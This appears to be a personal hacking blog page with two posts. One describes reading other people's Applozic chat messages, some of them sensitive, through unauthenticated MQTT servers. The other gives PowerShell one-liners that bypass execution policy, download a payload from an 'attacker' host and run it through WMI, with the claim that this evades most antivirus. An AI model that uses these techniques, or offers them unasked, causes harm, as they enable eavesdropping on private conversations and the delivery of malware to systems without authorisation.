I was surfing the web learning about MQTT when I came across something very interesting and started digging. So here is how I was able to sniff Applozic chat messages and download images being sent, and any files being sent to a client or chat user.
Lets start with what Applozic is. Their website say's, "We built Applozic for creators like you so that you don’t have to reinvent the wheel. Applozic provides a comprehensive set of Chat SDKs and easy-to-use APIs so that you can build and iterate quickly. Running on the cloud, the infrastructure is always available, continuously upgraded and auto-scales to meet your needs". So its a "cloud" based chat system that ppl can put in phone apps, web sites, etc. that some people are setting up and making bots to automate support for their service or product. It is using MQTT for the back end message delivery.
Now we will talk about MQTT. Their website says, "MQTT is a machine-to-machine (M2M)/"Internet of Things" connectivity protocol. It was designed as an extremely lightweight publish/subscribe messaging transport. It is useful for connections with remote locations where a small code footprint is required and/or network bandwidth is at a premium. For example, it has been used in sensors communicating to a broker via satellite link, over occasional dial-up connections with healthcare providers, and in a range of home automation and small device scenarios. It is also ideal for mobile applications because of its small size, low power usage, minimised data packets, and efficient distribution of information to one or many receivers". So its a messaging protocol for IoT devices. Looking around on shodan reviles most of the systems out there are just that, IoT devices. As far as I can tell most of them are home automation type systems. MQTT does offer authentication, but isn't used much including with Applozic.
Now back to Applozic. In most cases I found of this app being used in the wild is some type of chat support bot so no initial auth is required, but some are using a local auth mechanism to use the chat. For devs to use the API they do give out a API key. All of these apps are using the API which uses MQTT for back end message handling which isn't using authentication.
All of this leads to being able to sniff chat messages. I found a nice MQTT explorer online and pointed it at one of Applozic's MQTT servers and the messages came rolling in from all over the globe. Some of these messages had very sensitive information in them. I mean VERY sensitive!
Next step might be trying to publish to some of the titles, but that is another project.
To resolve this they are going to have to start using that API key as bilateral authentication with MQTT.
Applozic's implementation of MQTT seems to be unique, but they are not the only ones using it for human to human or human to bot communications. All of them have the same issue, unauthenticated access to MQTT allowing for anyone to see the convos. Also seen a few systems using MQTT to transfer XML payloads which was odd and likely open to XXE. Thats it, go explore and have fun!
Monday, November 11, 2019
Sunday, January 27, 2019
Two useful powershell cmds
Download bin:
powershell -exec bypass -c Invoke-WebRequest -Uri http://attacker/payload.exe -OutFile c:\Users\Public\Documents\payload.exe #wrap the execution of payload.exe in a batch file called start.cmd and "download" it to target as well.
Execute bin:
powershell -exec bypass -c Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList c:\Users\Public\Documents\start.cmd
The powershell got around most AVs and combo of the batch file and ps cmd the payload should run on its own, no matter how you managed code execution on the target. Persistence is the next todo.
Subscribe to:
Posts (Atom)